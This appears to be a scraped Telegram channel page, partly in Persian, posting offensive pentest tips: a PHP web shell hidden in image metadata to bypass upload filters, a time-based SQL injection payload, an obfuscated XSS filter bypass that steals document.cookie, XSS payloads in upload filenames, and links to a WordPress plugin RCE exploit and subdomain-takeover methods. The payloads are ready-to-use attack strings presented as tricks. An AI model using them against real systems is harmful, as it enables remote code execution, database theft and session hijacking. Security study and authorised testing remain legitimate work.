Telegram Web Link
🗒 Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution

آسیب پذیری RCE از افزونه وردپرسیه Background Image CROPPER ورژن 1.2


https://www.exploit-db.com/exploits/51998


@PenTest_Tm
Media is too big
VIEW IN TELEGRAM
🗒 Subdomain Takeover Vulnerability



@PenTest_Tm
🗒 Extract IPS From list of domains and then you can conduct your FUZZ/Manually check them for SDE /BAC , Ports , ..etc

grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'



@PenTest_Tm
@cryptosignalsfree12

بچهایی که تو کار کریپتو هستن میتونید استفاده کنید
🗒 MetaMask Subdomain Takeover (Consensys) | $500 Bug Bounty Poc | Subdomain Takeover Method

https://youtu.be/xP-u9i3N-3U?si=ooLVhCem9w5aSWos


@PenTest_Tm
🗒 XSS Payload Generator

تولید Payload با سناریو های مختلف و پشتیبانی از انواع متد با قابلیت ساخت پیلود برای دور زدن WAF و همچنین مبهم سازی پیلود و اضافه کردن کد جاوااسکریپت برای ساخت پیلود های پیشرفته تر و فیلتر پیشرفته کاراکترها برای دور زدن محدودیت هایی که هست


@PenTest_Tm
🗒 Bypass File Upload Filtering

In image:


exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>'
shell.jpg
mv shell.jpg shell.php.jpg



@PenTest_Tm
🗒 SQL Injection

After this, use sqlmap to extract the database

-11+PROCEDURE+ANALYSE(EXTRACTVALUE(9859,CONCAT(0x5c,(BENCHMARK(110000000,MD5(0x7562756f))))),1)--


@PenTest_Tm
🗒 Bypass XSS Filter with Array


<noscript><p title="</noscript><img src=x onerror=([,O,B,J,E,C,,]=[]+{},[T,R,U,E,F,A,L,S,,,N]=[!!O]+!O+B.E)[X=C+O+N+S+T+R+U+C+T+O+R][X](A+L+E+R+T+(document.cookie))()>"> 



@PenTest_Tm
بچها عیدتون مبارک ایشالا سال خوبی داشته باشین❤️
🗒 File Upload via XSS

If you found a file upload function for an image, try introducing an image with XSS in the filename like so:
<img src=x onerror=alert('XSS')>.png
"><img src=x onerror=alert('XSS')>.png
"><svg onmouseover=alert(1)>.svg
<<script>alert('xss')<!--a-->a.png


@PenTest_Tm
2025/07/06 18:08:18
Back to Top
HTML Embed Code: